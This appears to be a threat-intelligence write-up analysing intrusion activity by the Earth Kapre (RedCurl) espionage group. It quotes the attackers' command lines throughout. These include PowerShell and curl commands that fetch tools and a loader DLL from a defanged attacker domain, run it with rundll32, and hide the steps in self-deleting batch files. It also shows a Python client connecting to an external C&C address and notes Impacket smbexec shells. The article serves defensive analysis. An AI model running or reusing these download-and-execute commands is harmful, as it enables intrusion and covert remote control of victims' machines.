Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence

After examining the events around the time the file was created, we discovered that the threat actor executed the following actions:

We observed that the initial command employs PowerShell to download a file (curl.tmp) from the URL http://preston[.]melaniebest[.]com/ms/curl.tmp and saves it as curl.exe in the C:\Windows\System32\ directory. For the benefit of this analysis, we will use this domain, but the same analysis should hold for the other domains in the previously mentioned list of URLs. Curl.exe is a command-line tool and library designed for efficient data transfer with URLs. While it is a legitimate tool, it can also be abused by threat actors for malicious purposes.

%COMSPEC% /Q /c echo powershell -c “iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing” ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat

Next, 7za.tmp was downloaded and saved as 7za.exe in C:\Windows\System32\ directory. 7za.exe is a copy of 7-Zip, a popular open-source file compression and archiving utility.

C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat

The Earth Kapre loader was then downloaded using curl.exe from the same domain, http://preston[.]melaniebest[.]com/ms/ms.tmp, and was saved as ms.dll (though it should be noted that in some machines, the file name used was ps.dll) in the C:\Windows\System32\ directory. The threat actors used echo (as also seen in previous commands) and outputted it into a batch file, which is a commonly employed obfuscation technique. By echoing the command into a batch file, they could dynamically generate and execute commands, making it harder to analyze or detect malicious activities. The use of temporary batch files also allows for task automation and easier security monitoring evasion. We observed that the threat actors deleted the batch file afterward to cover their tracks.

C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\ms.dll http://preston[.]melaniebest.com/ms/ms.tmp ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\DFMPAa.bat

Since ms.tmp is an archive, the threat actors would need to use the previously downloaded 7za.exe (7zip) to extract file contents via the password “123”.

C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp\ ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\BuWmUA

Rundll32.exe was then used to execute ms.dll on the machine (in some machines, ps.dll was executed).

%COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat

The Python script was crafted to establish outbound communication and execute remote commands using Server Message Block (SMB) via port 445. During the execution of the script named client.py, an external IP address, 198[.]252[.]101[.]86, is passed as a command-line argument, suggesting its potential role as a C&C server.

“C:\Users\<username>\AppData\Roaming\MUIService\pythonw.exe”  C:\Users\<username>\AppData\Roaming\MUIService\rpv\client.py –server-ip 198[.]252[.]101[.]86 –server-port 41808

The presence of Impacket

Impacket is an open-source collection of Python classes for constructing and manipulating network protocols. Impacket activity was detected in the organization’s network, indicating its use of Windows network protocol interactions. The observed command lines align with Impacket’s smbexec script, enabling a semi-interactive shell via SMB. Threat actors are drawn to Impacket’s versatility and exploit its capabilities for unauthorized command execution, as highlighted in this blog entry.

Read More HERE